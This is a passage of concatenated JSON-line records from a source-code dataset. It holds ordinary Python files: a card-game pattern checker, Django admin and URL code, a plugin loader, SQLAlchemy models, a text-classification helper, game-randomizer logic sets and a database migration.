_add_to_length_functions_dict(length: int, f):\n if length in _length_to_pattern_functions:\n _length_to_pattern_functions[length].append(f)\n else:\n _length_to_pattern_functions[length] = [f]\n\n\n\"\"\"\n引入代码时执行,初始化dict\n\"\"\"\nfor one in _pattern_map_check:\n for pattern_ in one[0]:\n _add_to_length_functions_dict(pattern_ % 100, one[1])\n\n\ndef _check_all_possible(cards) -> CardDescription:\n \"\"\"\n 检查牌型的所有可能\n \"\"\"\n if len(cards) not in _length_to_pattern_functions:\n return None\n functions = _length_to_pattern_functions[len(cards)]\n for f in functions:\n result = f(cards)\n if result:\n return result\n\n\ndef check_all_bomb(cards):\n \"\"\"\n 注意这里长度是没有检查的!\n :param cards:\n :return:\n \"\"\"\n if len(cards) == 2:\n return _check_grand_bomb(cards)\n elif len(cards) % 4 == 0 and 4 <= len(cards) <= 20:\n return _check_bomb(cards)\n\n\ndef check_value_deal(cards, cd=None) -> CardDescription:\n \"\"\"\n :param cards: 牌,必须是min3型 (从小到大排序)\n :param cd: 先前的牌型描述,None表示首次出牌\n :return:\n \"\"\"\n if cd:\n # 优先检查炸弹\n result = check_all_bomb(cards)\n if result:\n return is_cd_bigger(result, cd)\n else:\n if pattern_is_bomb(cd.pattern): # 原来还是炸弹,肯定不行了\n return None\n else:\n # 都不是炸弹,检查常规 长度优先\n if len(cards) == cd.pattern % 100:\n f = _get_function_from_pattern(cd.pattern)\n result = f(cards)\n # 一样的pattern 对比 weight\n if result and result.weight > cd.weight:\n return result\n else:\n result = _check_all_possible(cards)\n return result\n","sub_path":"doudizhu_deprecated/doudizhu.py","file_name":"doudizhu.py","file_ext":"py","file_size_in_byte":9450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"119922997","text":"#!/usr/bin/python3.6\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef give_dir_items(path):\n lista = os.listdir(path)\n result = []\n\n for dat in lista:\n\n datPath = os.path.join(path, dat)\n # print(datPath)\n if os.path.isfile(datPath):\n result.append((dat, \"file\"))\n elif os.path.isdir(datPath):\n result.append((dat, \"directory\"))\n elif not os.path.exists(datPath):\n raise Exception(\"NE POSTOJI {}\".format(str(datPath)))\n else:\n result.append((dat, \"special\"))\n\n return result\n\ndef main():\n path = \".\"\n result = give_dir_items(path)\n print(result)\n\nif __name__ == \"__main__\":\n main()","sub_path":"mrezno/giga_file.py","file_name":"giga_file.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"12735096","text":"from django.conf.urls import url\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nfrom main.views import RegistrationView, EmailVerificationView\n\nurlpatterns = [\n url(r'^accounts/registration/$', RegistrationView.as_view(), name='registration'),\n url(r'^accounts/email_verification/?(?P[a-z0-9\\-]+)?/$',\n EmailVerificationView.as_view(), name='email_verification'),\n url(r'^accounts/login/$', LoginView.as_view(), name='login'),\n url(r'^accounts/logout/$', LogoutView.as_view(), name='logout'),\n]\n","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"74027879","text":"from os.path import join, dirname, abspath\nfrom os import listdir\nimport importlib.util\n\nimport logging\n\nfrom uuid import uuid4\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclass PluginManager(object):\n _plugins = {}\n _instance = None\n\n def __new__(clazz):\n if clazz._instance is None:\n clazz._instance = super(PluginManager, clazz).__new__(clazz)\n return clazz._instance\n\n def get_plugins(self):\n return self._plugins\n\n def get_user_plugins_dir(self):\n script_path = abspath(__file__)\n script_dir = dirname(script_path)\n return join(script_dir, \"user_plugins\")\n\n def load_plugins(self):\n logging.info(f\"Loading plugins...\")\n plugins_dir = self.get_user_plugins_dir()\n for file in listdir(plugins_dir):\n if file == \"__pycache__\":\n continue\n plugin_path = join(plugins_dir, file)\n module_name = f\"{file}\"\n logging.info(f\"\\tloading plugin {module_name} ({plugin_path})...\")\n spec = importlib.util.spec_from_file_location(\n f\"plugin_{module_name}\", plugin_path\n )\n plugin_module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(plugin_module)\n plugin_uuid = uuid4()\n self._plugins[plugin_uuid] = plugin_module.Plugin(\n runtime_id=plugin_uuid, name=module_name\n )\n","sub_path":"ingest/plugin_manager.py","file_name":"plugin_manager.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"343837793","text":"import setuptools\n\nwith open(\"../README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n name=\"cog\",\n version=\"0.0.1\",\n author_email=\"team@replicate.ai\",\n description=\"Containers for machine learning\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/replicate/cog\",\n license=\"Apache License 2.0\",\n python_requires=\">=3.6.0\",\n install_requires=[\n # intionally loose. perhaps these should be vendored to not collide with user code?\n \"flask>=2,<3\",\n \"redis>=3,<4\",\n \"requests>=2,<3\",\n \"PyYAML\",\n ],\n packages=setuptools.find_packages(),\n)\n","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"402386994","text":"def Summ(array):\r\n res = 0\r\n for i in array:\r\n res += i\r\n print(\"Сумма:\", res)\r\n return res\r\n\r\narr = [int(s,2) for s in input(\"Массив: \").split()]\r\n\r\nSumm(arr)\r\nt = arr[0]\r\nfor i in range(len(arr)):\r\n if i != len(arr)-1:\r\n arr[i],arr[i+1] = arr[i+1],arr[i]\r\n else:\r\n t,arr[i] = arr[i],t\r\nSumm(arr)\r\n","sub_path":"Lab 5/5_1_HIgh.py","file_name":"5_1_HIgh.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"550258850","text":"# -*- coding: utf-8 -*-\n\"\"\"\n events.admin\n ~~~~~~~~~~~~\n\n Admin interface for Events.\n\n :copyright: (c) 2015 by Rambler&Co.\n\"\"\"\n\nimport reversion\n\nfrom django import forms\nfrom django.contrib import admin\nfrom django.contrib import messages\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db import transaction\nfrom django.http import Http404\nfrom django.http import HttpResponseRedirect\nfrom django.utils.decorators import method_decorator\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.contrib.admin.utils import unquote\nfrom django.contrib.admin import helpers\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import reverse\nfrom django.forms.formsets import all_valid\nfrom django.utils.encoding import force_text\nfrom django.utils.html import escape\n\nfrom admin_app.core.admin import GalleryInline\nfrom admin_app.core.forms import ContentModelForm\nfrom admin_app.core.utils import tools\nfrom admin_app.core.utils.admin import AddUserMixin\nfrom admin_app.core.utils.admin import ContentAdminMixin\nfrom admin_app.core.utils.admin import EventPlaceMergeAdminMixin\nfrom admin_app.core.utils.admin import ReadonlyInline\nfrom admin_app.core.utils.constants import WEEK_DAYS\nfrom admin_app.core.utils.widgets import AjaxChosenWidget\nfrom admin_app.core.utils.widgets import AutocompleteWidget\nfrom admin_app.content_properties.admin import ContentPropertyInline\nfrom datetimewidget.widgets import DateWidget\nfrom datetimewidget.widgets import TimeWidget\nfrom admin_app.core.utils.options import DEFAULT_FIELDSETS\nfrom admin_app.events.models import Event\nfrom admin_app.events.models import EventPlace\nfrom admin_app.events.models import Session\nfrom admin_app.payments.admin import PaymentInline\nfrom common.seo.admin import SeoInline\nfrom django.contrib.staticfiles.storage import staticfiles_storage\n\n\n# forms\n\nclass SessionForm(forms.ModelForm):\n\n class Meta:\n widgets = {\n 'date_start': DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n 'time_start': TimeWidget(attrs={}, options={'language': 'ru'}),\n 'time_end': TimeWidget(attrs={}, options={'language': 'ru'}),\n }\n\n class Media:\n js = (\n staticfiles_storage.url(\n 'admin/js/admin/sessions.formset.datepicker.js'\n ),\n )\n\n\nclass EventForm(ContentModelForm):\n additional_fieldsets = [\n {\n 'value': (\n None,\n {\n 'fields': (\n 'duration',\n 'timetable',\n )\n }\n )\n },\n {\n 'index': 2,\n 'value': DEFAULT_FIELDSETS['dates']\n },\n {\n 'index': -2,\n 'value': DEFAULT_FIELDSETS['prices']\n },\n {\n 'index': -2,\n 'value': DEFAULT_FIELDSETS['contacts']\n },\n {\n 'index': -2,\n 'value': DEFAULT_FIELDSETS['rate']\n },\n ]\n\n def clean(self):\n self.cleaned_data = super(EventForm, self).clean()\n\n date_start = self.cleaned_data.get('date_start')\n date_end = self.cleaned_data.get('date_end')\n if date_start and date_end and date_end < date_start:\n self.cleaned_data.update({\n 'date_start': date_end,\n 'date_end': date_start,\n })\n\n price_from = self.cleaned_data.get('price_from')\n price_till = self.cleaned_data.get('price_till')\n if price_from and price_till and price_from > price_till:\n self.cleaned_data.update({\n 'price_from': price_till,\n 'price_till': price_from,\n })\n\n return self.cleaned_data\n\n class Meta:\n widgets = {\n 'title': AutocompleteWidget(model=Event),\n 'main_image': AjaxChosenWidget(),\n }\n\n\nclass BulkSessionForm(forms.ModelForm):\n date_start = forms.DateField(\n label=u'Начальная дата',\n required=True,\n widget=DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n )\n date_end = forms.DateField(\n label=u'Конечная дата',\n required=True,\n widget=DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n )\n days = forms.MultipleChoiceField(\n choices=WEEK_DAYS,\n label=u'Дни недели',\n required=True,\n widget=forms.CheckboxSelectMultiple,\n )\n\n def clean(self):\n def get_working_days(date_start_obj, date_end_obj, days):\n from dateutil import rrule\n if days:\n weekdays = rrule.rrule(\n rrule.DAILY,\n byweekday=days,\n dtstart=date_start_obj,\n until=date_end_obj\n )\n else:\n weekdays = []\n return list(weekdays)\n\n self.cleaned_data = forms.ModelForm.clean(self)\n\n date_start = self.cleaned_data.get('date_start')\n date_end = self.cleaned_data.get('date_end')\n\n if date_start and date_end and date_end < date_start:\n self.cleaned_data.update({\n 'date_start': date_end,\n 'date_end': date_start,\n })\n\n self.days_list = get_working_days(\n self.cleaned_data.get('date_start'),\n self.cleaned_data.get('date_end'),\n map(int, self.cleaned_data.get('days', []))\n )\n\n if not self.days_list:\n raise ValidationError({\n 'days': u'Пожалуйста выберите дни недели, которые '\n u'попадают между выбранными датами.'\n })\n\n return self.cleaned_data\n\n def save(self, commit=True, formset=None, times_start=None, time_end=None):\n instances = []\n times = filter(\n None, set([i.get('time_start') for i in formset.cleaned_data])\n )\n times = times_start or times\n for day in self.days_list:\n for time_start in times:\n inst, create = Session.objects.get_or_create(\n event_place=self.instance,\n date_start=day,\n time_start=time_start,\n defaults={'time_end': time_end}\n )\n if create:\n instances.append(inst)\n return instances\n\n class Meta:\n exclude = tuple()\n model = EventPlace\n\n def get_fieldsets(self):\n return [(None, {'fields': [i.name for i in self.visible_fields()]})]\n\n class Media:\n js = (\n staticfiles_storage.url(\n 'admin/js/admin/sessions.formset.datepicker.js'\n ),\n )\n\n\n# inlines\n\nclass EventInline(ReadonlyInline):\n model = Event\n fields = (\n 'title',\n 'places_display',\n 'date_start',\n 'date_end',\n 'rate',\n )\n readonly_fields = (\n 'title',\n 'places_display',\n 'date_start',\n 'date_end',\n 'rate',\n )\n\n\nclass SessionInline(admin.TabularInline):\n form = SessionForm\n model = Session\n extra = 1\n exclude = ('id', )\n\n\nclass StartTimeSessionInline(SessionInline):\n exclude = ('id', 'date_start')\n extra = 1\n\n\nclass EventPlaceInline(admin.TabularInline):\n model = EventPlace\n extra = 1\n fields = ('place', 'schedule_btn')\n readonly_fields = ('schedule_btn', )\n formfield_overrides = {\n models.ForeignKey: {'widget': AjaxChosenWidget}\n }\n\n\n# admins\n\nclass EventPlaceAdmin(reversion.VersionAdmin):\n inlines = (SessionInline, )\n list_display = (\n 'modified',\n 'event_title',\n 'place_title',\n )\n search_fields = ('event__title', 'place__title')\n readonly_fields = ('event', 'place')\n formfield_overrides = {\n models.ForeignKey: {'widget': AjaxChosenWidget},\n }\n\n def change_view(self, request, object_id, form_url='', extra_context=None):\n extra_context = {\n 'has_bulk_session_view': hasattr(self, 'bulk_session_view'),\n }\n return super(EventPlaceAdmin, self).change_view(\n request, object_id, form_url='', extra_context=extra_context\n )\n\n def has_add_permission(self, request):\n return False\n\n @method_decorator(csrf_protect)\n @transaction.atomic\n def bulk_session_view(self, request, object_id, extra_context=None):\n model = self.model\n opts = model._meta\n bulk_session_inlines = [StartTimeSessionInline]\n\n obj = self.get_object(request, unquote(object_id))\n if not self.has_change_permission(request, obj):\n raise PermissionDenied\n if obj is None:\n raise Http404(\n _('{name} object with primary key {key} does not exist.')\n .format(\n name=force_text(opts.verbose_name),\n key=escape(object_id),\n )\n )\n\n ModelForm = BulkSessionForm\n if request.method == 'POST':\n data = request.POST\n data['place'] = obj.place.pk\n data['event'] = obj.event.pk\n form = ModelForm(data, request.FILES, instance=obj)\n form_validated = True if form.is_valid() else False\n new_object = form.instance\n\n with tools.replace_obj_var(self, 'inlines', bulk_session_inlines):\n formsets, inline_instances = self._create_formsets(\n request, new_object, change=True\n )\n if all_valid(formsets) and form_validated:\n new_objects = form.save(formset=formsets[0])\n redirect_url = reverse('admin:{0}_{1}_change'.format(\n opts.app_label, opts.model_name),\n current_app=self.admin_site.name,\n args=[new_object.pk])\n return self.response_bulk_session(\n request, redirect_url, new_objects\n )\n else:\n form = ModelForm(instance=obj)\n with tools.replace_obj_var(self, 'inlines', bulk_session_inlines):\n formsets, inline_instances = self._create_formsets(\n request, None, change=False\n )\n\n adminForm = helpers.AdminForm(\n form,\n list(form.get_fieldsets()),\n self.get_prepopulated_fields(request, obj),\n self.get_readonly_fields(request, obj),\n model_admin=self)\n media = self.media + adminForm.media\n\n inline_formsets = self.get_inline_formsets(\n request, formsets, inline_instances, obj\n )\n\n for inline_formset in inline_formsets:\n media = media + inline_formset.media\n\n context = dict(\n site_title=self.admin_site.site_title,\n site_header=self.admin_site.site_header,\n title=_(u'Добавить несколько сеансов'),\n adminform=adminForm,\n object_id=object_id,\n original=obj,\n media=media,\n inline_admin_formsets=inline_formsets,\n errors=helpers.AdminErrorList(form, formsets),\n preserved_filters=self.get_preserved_filters(request),\n )\n\n context.update(extra_context or {})\n\n form_url = ''\n new_template = 'admin/{0}/{1}/bulk_session.html'.format(\n opts.app_label, opts.model_name)\n with tools.replace_obj_var(self, 'change_form_template', new_template):\n result = self.render_change_form(\n request, context,\n add=False,\n change=True,\n obj=obj,\n form_url=form_url\n )\n return result\n\n def response_bulk_session(self, request, redirect_url, instances):\n if instances:\n sessions_msg = u'
    {0}
'.format(u''.join(\n [u'
  • Дата: {0} Время начала: {1}
  • '\n .format(i.date_start.date(), i.time_start)\n for i in instances]))\n msg = u'Успешно добавленные сеансы ({0}):
    {1}'\\\n .format(len(instances), sessions_msg)\n else:\n msg = _(u'Сеансы не были добавлены.')\n self.message_user(request, mark_safe(msg), messages.SUCCESS)\n return HttpResponseRedirect(redirect_url)\n\n def get_urls(self):\n from django.conf.urls import url\n urlpatterns = list(super(EventPlaceAdmin, self).get_urls())\n urlpatterns.insert(-1, url(r'^(.+)/bulk_session/$',\n self.bulk_session_view,\n name='admin_bulk_session'))\n return urlpatterns\n\n def event_title(self, obj):\n return obj.event.title\n event_title.allow_tags = True\n event_title.admin_order_field = 'event__title'\n event_title.short_description = _(u'Событие')\n\n def place_title(self, obj):\n return obj.place.title\n place_title.allow_tags = True\n place_title.admin_order_field = 'place__title'\n place_title.short_description = _(u'Место')\n\n\nclass EventAdmin(\n EventPlaceMergeAdminMixin,\n ContentAdminMixin,\n AddUserMixin,\n reversion.VersionAdmin\n):\n form = EventForm\n fieldsets = EventForm.get_fieldsets()\n list_display = (\n 'title',\n 'date_start',\n 'date_end',\n 'main_tag',\n 'tags_display',\n 'source_info_display',\n 'created',\n 'modified',\n 'pub_date',\n 'status',\n 'content_actions',\n )\n inlines = (\n GalleryInline,\n SeoInline,\n PaymentInline,\n EventPlaceInline,\n ContentPropertyInline,\n )\n\n\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(EventPlace, EventPlaceAdmin)\n","sub_path":"src/admin_app/events/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":14448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"382821044","text":"# snake parameters\r\nfrom pygame import K_p\r\n\r\nSNAKE_COLOR = (255,0,0)\r\nSNAKE_POS0 = (10,10)\r\n\r\nSNACK_COLOR = (0,255,0)\r\nSNAKETAIL_COLOR = (0,0,255)\r\n# to change the snake speed\r\nSNAKE_DT = 0.15# sleep in seconds\r\n# snake eyes color\r\nEYE_COLOR = (0,0,0)\r\n\r\n# grid numbers\r\nNROWS = 20\r\nNCOLS = 20\r\n# grid size\r\nGRID_DX = 25\r\nGRID_DY = 25\r\n# grid color\r\nGRID_COLOR = (255,255,255)\r\n\r\n# display\r\nDISPLAY_WIDTH = GRID_DX*NROWS\r\nDISPLAY_HEIGHT = GRID_DY*NCOLS\r\n# display background\r\nBACKGROUND_COLOR = (0,0,0)\r\n\r\n\r\n# pause key\r\nPAUSE_KEY = K_p","sub_path":"snake_pygame/CONFIGS.py","file_name":"CONFIGS.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"514537298","text":"#!/usr/bin/env python3\n\nfrom sqlalchemy.orm import validates\nfrom sqlalchemy import Column, Integer, String\nfrom database import Base\n\n\nclass Property(Base):\n __tablename__ = \"properties\"\n id = Column(Integer, primary_key=True)\n x = Column(Integer)\n y = Column(Integer)\n beds = Column(Integer)\n baths = Column(Integer)\n squareMeters = Column(Integer)\n\n def __init__(self, x=None, y=None, beds=None, baths=None, squareMeters=None):\n self.x = x\n self.y = y\n self.beds = beds\n self.baths = baths\n self.squareMeters = squareMeters\n\n def __repr__(self):\n return \"\" % (self.id)\n\n @validates(\"x\")\n def validate_x(self, key, value):\n if 0 <= int(value) and int(value) <= 1400:\n return value\n\n raise ValueError()\n\n @validates(\"y\")\n def validate_y(self, key, value):\n if 0 <= int(value) and int(value) <= 1000:\n return value\n\n raise ValueError()\n\n @validates(\"beds\")\n def validate_beds(self, key, value):\n if 1 <= int(value) and int(value) <= 5:\n return value\n\n raise ValueError()\n\n @validates(\"baths\")\n def validate_baths(self, key, value):\n if 1 <= int(value) and int(value) <= 4:\n return value\n\n raise ValueError()\n\n @validates(\"squareMeters\")\n def validate_square_meters(self, key, value):\n if 20 <= int(value) and int(value) <= 240:\n return value\n\n raise ValueError()\n\n\nclass Province(Base):\n __tablename__ = \"provinces\"\n id = Column(Integer, primary_key=True)\n name = Column(String(30))\n ax = Column(Integer)\n ay = Column(Integer)\n bx = Column(Integer)\n by = Column(Integer)\n\n def __init__(self, name=None, ax=None, ay=None, bx=None, by=None):\n self.name = name\n self.ax = ax\n self.ay = ay\n self.bx = bx\n self.by = by\n\n def __repr__(self):\n return \"\" % (self.id, self.name)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"409076802","text":"import pickle\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import punkt\nfrom nltk.corpus.reader import wordnet\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objs as go\n\npath_models = \"./04. Model Training/Models/\"\n\n# SVM\npath_svm = path_models + 'best_svc.pickle'\nwith open(path_svm, 'rb') as data:\n svc_model = pickle.load(data)\n\npath_tfidf = \"./03. Feature Engineering/Pickles/tfidf.pickle\"\n\nwith open(path_tfidf, 'rb') as data:\n tfidf = pickle.load(data)\n\ncategory_codes = {\n 'business': 0,\n 'entertainment': 1,\n 'politics': 2,\n 'sport': 3,\n 'tech': 4,\n 'other':5\n}\n\npunctuation_signs = list(\"?:!.,;\")\nstop_words = list(stopwords.words('english'))\n\ndef create_features_from_df(df):\n \n df['Content_Parsed_1'] = df['Content'].str.replace(\"\\r\", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(\"\\n\", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(\" \", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace('\"', '')\n \n df['Content_Parsed_2'] = df['Content_Parsed_1'].str.lower()\n \n df['Content_Parsed_3'] = df['Content_Parsed_2']\n for punct_sign in punctuation_signs:\n df['Content_Parsed_3'] = df['Content_Parsed_3'].str.replace(punct_sign, '')\n \n df['Content_Parsed_4'] = df['Content_Parsed_3'].str.replace(\"'s\", \"\")\n \n wordnet_lemmatizer = WordNetLemmatizer()\n nrows = len(df)\n lemmatized_text_list = []\n for row in range(0, nrows):\n\n # Create an empty list containing lemmatized words\n lemmatized_list = []\n # Save the text and its words into an object\n text = df.loc[row]['Content_Parsed_4']\n text_words = text.split(\" \")\n # Iterate through every word to lemmatize\n for word in text_words:\n lemmatized_list.append(wordnet_lemmatizer.lemmatize(word, pos=\"v\"))\n # Join the list\n lemmatized_text = \" \".join(lemmatized_list)\n # Append to the list containing the texts\n lemmatized_text_list.append(lemmatized_text)\n \n df['Content_Parsed_5'] = lemmatized_text_list\n \n df['Content_Parsed_6'] = df['Content_Parsed_5']\n for stop_word in stop_words:\n regex_stopword = r\"\\b\" + stop_word + r\"\\b\"\n df['Content_Parsed_6'] = df['Content_Parsed_6'].str.replace(regex_stopword, '')\n \n # TF-IDF\n features = tfidf.transform(df['Content_Parsed_6']).toarray()\n \n return features\n\n\ndef get_category_name(category_id):\n for category, id_ in category_codes.items(): \n if id_ == category_id:\n return category\n\ndef predict_from_features(features):\n \n # Obtain the highest probability of the predictions for each article\n predictions_proba = svc_model.predict_proba(features).max(axis=1) \n \n # Predict using the input model\n predictions_pre = svc_model.predict(features)\n\n # Replace prediction with 6 if associated cond. probability less than threshold\n predictions = []\n\n for prob, cat in zip(predictions_proba, predictions_pre):\n if prob > .65:\n predictions.append(cat)\n else:\n predictions.append(5)\n\n # Return result\n categories = [get_category_name(x) for x in predictions]\n \n return categories\n\ndef complete_df(df, categories):\n try:\n df['Prediction'] = categories\n except Exception as ex:\n print(\"Exception\", ex, len(df), len(categories))\n finally:\n df['Prediction'] = \"other\"\n\n return df","sub_path":"06. App Creation/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"544226936","text":"\"\"\"\nHelper functions to deliver entrance/exit/region sets to OWG rules.\n\"\"\"\n\n\n# TODO: reevaluate these points:\n# why is this its own module?\n# why are these functions?\n# why is it named sets, when it was originally functions that return lists and had nothing to do with sets?\n\ndef get_immediately_accessible_entrances():\n \"\"\"\n Entrances that are available with no items at all.\n\n At this point, these are fake flipper spots.\n \"\"\"\n yield 'Hobo Bridge'\n yield 'Zoras River'\n yield 'Lake Hylia Central Island Pier'\n\n\ndef get_sword_required_superbunny_mirror_regions():\n \"\"\"\n Cave regions that superbunny can get through - but only with a sword.\n \"\"\"\n yield 'Mini Moldorm Cave'\n yield 'Spiral Cave (Top)'\n\n\ndef get_invalid_mirror_bunny_entrances_dw():\n \"\"\"\n Dark World entrances that can't be superbunny-mirrored into.\n \"\"\"\n\n yield 'Skull Woods Final Section (Entrance)'\n yield 'Hype Cave'\n yield 'Bonk Fairy (Dark)'\n yield 'Thieves Town'\n yield 'Dark World Hammer Peg Cave'\n yield 'Brewery'\n yield 'Hookshot Cave'\n yield 'Hookshot Cave Exit (South)'\n yield 'Dark Lake Hylia Ledge Fairy'\n yield 'Dark Lake Hylia Ledge Spike Cave'\n\n\ndef get_invalid_mirror_bunny_entrances_lw():\n \"\"\"\n Light World entrances that can't be superbunny-mirrored into.\n\n A couple of these, like Blind's Hideout, are odd cases where the pixel\n leading into the entrance prevents mirror superbunnying - generally due to\n there being stairs there. \n \"\"\"\n\n yield 'Bonk Rock Cave'\n yield 'Bonk Fairy (Light)'\n yield 'Blinds Hideout'\n yield '50 Rupee Cave'\n yield '20 Rupee Cave'\n yield 'Checkerboard Cave'\n yield 'Light Hype Fairy'\n yield 'Waterfall of Wishing'\n yield 'Light World Bomb Hut'\n yield 'Mini Moldorm Cave'\n yield 'Ice Rod Cave'\n yield 'Hyrule Castle Secret Entrance Stairs'\n yield 'Sanctuary Grave'\n yield 'Kings Grave'\n yield 'Tower of Hera'\n\n\ndef get_superbunny_accessible_locations():\n \"\"\"\n Interior locations that can be accessed with superbunny state.\n \"\"\"\n\n yield 'Waterfall of Wishing - Left'\n yield 'Waterfall of Wishing - Right'\n yield 'King\\'s Tomb', 'Floodgate'\n yield 'Floodgate Chest'\n yield 'Cave 45'\n yield 'Bonk Rock Cave'\n yield 'Brewery'\n yield 'C-Shaped House'\n yield 'Chest Game'\n yield 'Mire Shed - Left'\n yield 'Mire Shed - Right'\n yield 'Secret Passage'\n yield 'Ice Rod Cave'\n yield 'Pyramid Fairy - Left'\n yield 'Pyramid Fairy - Right'\n yield 'Superbunny Cave - Top'\n yield 'Superbunny Cave - Bottom'\n\n\ndef get_boots_clip_exits_lw(inverted = False):\n \"\"\"\n Special Light World region exits that require boots clips.\n \"\"\"\n\n yield 'Bat Cave River Clip Spot'\n yield 'Light World DMA Clip Spot'\n yield 'Hera Ascent'\n yield 'Death Mountain Return Ledge Clip Spot'\n yield 'Death Mountain Glitched Bridge'\n yield 'Zora Descent Clip Spot'\n yield 'Desert Northern Cliffs'\n yield 'Lake Hylia Island Clip Spot'\n yield 'Death Mountain Descent'\n yield 'Graveyard Ledge Clip Spot'\n # Also requires a waterwalk setup, but the point still remains.\n yield 'Waterfall of Wishing'\n\n if not inverted:\n yield 'Spectacle Rock Clip Spot'\n yield 'Bombos Tablet Clip Spot'\n yield 'Floating Island Clip Spot'\n yield 'Cave 45 Clip Spot'\n\n\ndef get_boots_clip_exits_dw(inverted = False):\n \"\"\"\n Special Dark World region exits that require boots clips.\n \"\"\"\n\n yield 'Dark World DMA Clip Spot'\n yield 'Bumper Cave Ledge Clip Spot'\n yield 'Catfish Descent'\n yield 'Hammer Pegs River Clip Spot'\n yield 'Dark Lake Hylia Ledge Clip Spot'\n yield 'Dark Desert Cliffs Clip Spot'\n yield 'Dark Death Mountain Descent'\n\n if not inverted:\n yield 'Ganons Tower Ascent'\n yield 'Dark Death Mountain Glitched Bridge'\n yield 'Turtle Rock (Top) Clip Spot'\n\n\ndef get_glitched_speed_drops_dw():\n \"\"\"\n Dark World drop-down ledges that require glitched speed.\n \"\"\"\n yield 'Dark Death Mountain Ledge Clip Spot'\n\n\ndef get_mirror_clip_spots_dw():\n \"\"\"\n Mirror shenanigans that are in logic even if the player is a bunny.\n \"\"\"\n yield 'Dark Death Mountain Offset Mirror'\n yield 'Dark Death Mountain Bunny Descent Mirror Spot'\n\n\ndef get_mirror_clip_spots_lw():\n \"\"\"\n Inverted mirror shenanigans in logic even if the player is a bunny.\n \"\"\"\n yield 'Death Mountain Bunny Descent Mirror Spot'\n yield 'Death Mountain Offset Mirror'\n\n\ndef get_invalid_bunny_revival_dungeons():\n \"\"\"\n Dungeon regions that can't be bunny revived from.\n \"\"\"\n\n yield 'Tower of Hera (Bottom)'\n yield 'Swamp Palace (Entrance)'\n yield 'Turtle Rock (Entrance)'\n","sub_path":"OWGSets.py","file_name":"OWGSets.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"205781738","text":"\"\"\"full datetime\n\nRevision ID: 144649a54955\nRevises: 305ace38cf61\nCreate Date: 2015-10-15 15:03:12.623726\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '144649a54955'\ndown_revision = '305ace38cf61'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ntry:\n from config import DATABASE_URL\nexcept:\n from configdist import DATABASE_URL\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n if DATABASE_URL[:5] == 'mysql':\n op.alter_column('media', 'created_at', type_=mysql.DATETIME(fsp=6), nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n if DATABASE_URL[:5] == 'mysql':\n op.alter_column('media', 'created_at', type_=mysql.DATETIME(fsp=6), nullable=True)\n ### end Alembic commands ###\n","sub_path":"reactgur/migrations/versions/144649a54955_full_datetime.py","file_name":"144649a54955_full_datetime.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"152346558","text":"\"\"\"\nThis file contains the current state of packaging in Python using\nDistribution Utilities (Distutils) and its extension from the 